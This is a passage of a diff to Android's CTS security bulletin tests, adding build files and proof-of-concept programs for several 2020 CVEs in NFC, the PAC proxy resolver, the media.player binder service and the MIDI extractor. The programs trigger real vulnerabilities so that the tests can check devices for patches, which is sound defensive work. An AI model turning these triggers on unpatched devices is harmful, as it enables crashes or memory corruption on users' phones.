p_data->data.p_data->offset = 0; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp new file mode 100644 index 00000000000..cbe6a4e9f02 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/Android.bp @@ -0,0 +1,33 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2020-0073", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include", + "system/nfc/src/gki/common", + "system/nfc/src/include", + "system/nfc/src/gki/ulinux", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp new file mode 100644 index 00000000000..d6ea4462558 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp @@ -0,0 +1,43 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include <nfc_api.h> +#include <rw_int.h> + +extern tRW_CB rw_cb; +void rw_init(void); +void rw_t2t_handle_rsp(uint8_t* p_data); +void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) { + (void)event; + (void)p_rw_data; +} + +int main() { + tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t; + rw_init(); + rw_cb.p_cback = &poc_cback; + p_t2t->state = RW_T2T_STATE_DETECT_TLV; + p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV; + p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE; + p_t2t->found_tlv = TAG_LOCK_CTRL_TLV; + p_t2t->bytes_count = 1; + p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES; + uint8_t data[T2T_READ_DATA_LEN]; + rw_t2t_handle_rsp(data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/Android.bp new file mode 100644 index 00000000000..d626fccdfe5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/Android.bp @@ -0,0 +1,30 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0240", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + include_dirs: [ + "external/chromium-libpac/includes", + ], + shared_libs: [ + "libpac", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/poc.cpp new file mode 100644 index 00000000000..61e5e9f032b --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0240/poc.cpp @@ -0,0 +1,54 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <codecvt> +#include <fstream> +#include <iostream> +#include <proxy_resolver_v8_wrapper.h> +#include <string.h> +#include <sys/types.h> + +const char16_t *spec = u""; +const char16_t *host = u""; + +int main(int argc, char *argv[]) { + if (argc != 2) { + return EXIT_FAILURE; + } + + ProxyResolverV8Handle *handle = ProxyResolverV8Handle_new(); + + std::ifstream t; + t.open(argv[1]); + if (t.rdstate() != std::ifstream::goodbit) { + return EXIT_FAILURE; + } + t.seekg(0, std::ios::end); + size_t size = t.tellg(); + char *raw = (char *)calloc(size + 1, sizeof(char)); + t.seekg(0); + t.read(raw, size); + std::string u8Script(raw); + std::u16string u16Script = + std::wstring_convert<std::codecvt_utf8_utf16<char16_t>, char16_t>{} + .from_bytes(u8Script); + + ProxyResolverV8Handle_SetPacScript(handle, u16Script.data()); + ProxyResolverV8Handle_GetProxyForURL(handle, spec, host); + + ProxyResolverV8Handle_delete(handle); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp new file mode 100644 index 00000000000..f45207f0655 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/Android.bp @@ -0,0 +1,29 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0243", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libutils", + "libbinder", + "libutilscallstack", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp new file mode 100644 index 00000000000..5841427f76f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0243/poc.cpp @@ -0,0 +1,97 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> + +#include "../includes/common.h" + +using namespace android; + +typedef struct ThreadParams { + sp<IBinder> service; +} ThreadParams; + +static void *thread_getParameter(void *p) { + ThreadParams *params = (ThreadParams *)p; + int err; + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + Parcel data, reply; + data.writeInterfaceToken(params->service->getInterfaceDescriptor()); + int key = (('m') << 24 | ('t') << 16 | ('r') << 8 | ('X')); + data.writeInt32(key); + err = params->service->transact(/*GET_PARAMETER_ID*/ 31, data, &reply, 0); + if (err == EPIPE) { + break; + } + usleep(5000); + } + return nullptr; +} + +int main() { + status_t err; + sp<IServiceManager> sm = defaultServiceManager(); + String16 name(String16("media.player")); + sp<IBinder> service = sm->checkService(name); + sp<IBinder> binder = nullptr; + if (not service) { + return EXIT_FAILURE; + } + + String16 interface_name = service->getInterfaceDescriptor(); + Parcel data, reply; + data.writeInterfaceToken(interface_name); + data.writeStrongBinder(new BBinder()); + for (int i = 0; i < 1024; ++i) + data.writeInt32(1); + if (service) { + err = service->transact(/*CREATE_ID*/ 1, data, &reply, 0); + binder = reply.readStrongBinder(); + } + + if (not binder) { + return EXIT_FAILURE; + } + + pthread_t t1, t2; + + ThreadParams *params = new ThreadParams(); + params->service = binder; + pthread_create(&t1, nullptr, thread_getParameter, params); + pthread_create(&t2, nullptr, thread_getParameter, params); + + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + if (not binder) { + break; + } + Parcel data, reply; + data.writeInterfaceToken(binder->getInterfaceDescriptor()); + data.writeStrongBinder(binder); + err = binder->transact(/*SET_DATA_SOURCE_URL_ID*/ 2, data, &reply, 0); + if (err == EPIPE) { + break; + } + usleep(500000); + } + + pthread_join(t1, nullptr); + pthread_join(t2, nullptr); + delete params; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp new file mode 100644 index 00000000000..9f254e33199 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0381", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libstagefright/foundation/include", + "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/include/media/stagefright", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp new file mode 100644 index 00000000000..1965f503b76 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0383", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/foundation/include", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp new file mode 100644 index 00000000000..313f21a7f56 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp new file mode 100644 index 00000000000..5d003453f3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0384", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libstagefright/foundation/include", + "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/include/media/stagefright", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp new file mode 100644 index 00000000000..5a32f57234e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0385", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libstagefright/foundation/include", + "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/include/media/stagefright", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp index 